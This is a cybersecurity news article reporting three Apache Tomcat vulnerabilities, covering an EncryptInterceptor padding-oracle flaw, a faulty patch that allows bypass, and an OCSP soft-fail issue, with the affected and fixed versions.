Apache Tomcat Vulnerabilities Enables Bypass of EncryptInterceptor

Home Apache Apache Tomcat Vulnerabilities Enables Bypass of EncryptInterceptor The Apache Software Foundation has released emergency security updates to address multiple vulnerabilities in Apache Tomcat. The latest advisories highlight a critical patching error that inadvertently exposed servers to an interception bypass, as well as issues affecting certificate authentication and padding-oracle attacks. Administrators must update their deployments immediately to secure their environments against potential exploitation. EncryptInterceptor Bypass and Padding Oracle Attacks The most pressing issue stems from a flawed security patch. Initially, security researchers discovered CVE-2026-29146, an “Important” severity flaw where the EncryptInterceptor used Cipher Block Chaining (CBC) by default. This configuration left the server vulnerable to a padding oracle attack, potentially allowing malicious actors to decrypt intercepted traffic. Oligo Security researchers Uri Katz and Avi Lumelsky identified and reported this initial cryptographic weakness. To resolve the padding oracle threat, Apache released an initial round of updates. However, the fix introduced a new, equally severe vulnerability tracked as CVE-2026-34486. Identified by Bartlomiej Dmitruk from striga.ai, this subsequent flaw allowed attackers to bypass the EncryptInterceptor completely. Because the initial patch was defective, organizations running the intermediary update versions are currently exposed to this bypass mechanism. Alongside the EncryptInterceptor issues, Apache addressed a “Moderate” severity vulnerability tracked as CVE-2026-34500. This flaw impacts the Online Certificate Status Protocol (OCSP) checks within Tomcat. Under specific conditions, when the Foreign Function and Memory (FFM) API is used, the system experiences a soft fail during OCSP validation, even if the administrator explicitly disabled soft-failing. Consequently, CLIENT_CERT authentication does not fail as expected, creating unexpected authentication behaviors that could compromise access controls. Haruki Oyama from Waseda University discovered and reported this (CVE-2026-34500) certificate validation error. The vulnerabilities impact multiple branches of Apache Tomcat. The flawed patch that allows the EncryptInterceptor bypass (CVE-2026-34486) specifically affects these exact releases: Apache Tomcat 11.0.20 Apache Tomcat 10.1.53 Apache Tomcat 9.0.116 The broader vulnerabilities, including the initial padding oracle attack and the certificate validation failures, impact a wider range of earlier versions: Apache Tomcat 11.0.0-M1 through 11.0.20 Apache Tomcat 10.1.0-M1 through 10.1.53 Apache Tomcat 9.0.13 through 9.0.116 To resolve all three vulnerabilities, including the flawed EncryptInterceptor patch and the OCSP certificate validation failure, administrators must upgrade their systems to the latest secure releases. The Apache Software Foundation strongly recommends applying the following updates: Upgrade Apache Tomcat 11.x deployments to version 11.0.21 or later Upgrade Apache Tomcat 10.x deployments to version 10.1.54 or later Upgrade Apache Tomcat 9.x deployments to version 9.0.117 or later Organizations running older, End-of-Life (EOL) versions of Tomcat should migrate to a supported branch immediately, as these legacy systems will not receive patches for the padding oracle attack or subsequent bypass flaws. Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories. RELATED ARTICLESMORE FROM AUTHOR Cyber Security News Iran-Linked CyberAv3ngers Sets Sights on Water Utilities and Industrial Controllers Cyber Security News Hackers Hide VIPERTUNNEL Python Backdoor Inside Fake DLL and Obfuscated Loader Chain Cyber Security News APT37 Abuses Facebook, Telegram, and Tampered Installer in New Targeted Intrusion Attack Top 10 Top 10 Best User Access Management Tools in 2026 April 4, 2026 Top 10 Best VPN For Chrome in 2026 April 4, 2026 20 Best Application Performance Monitoring Tools in 2026 April 3, 2026 Top 10 Best VPN For Linux In 2026 April 3, 2026 10 Best VPN For Privacy In 2026 April 2, 2026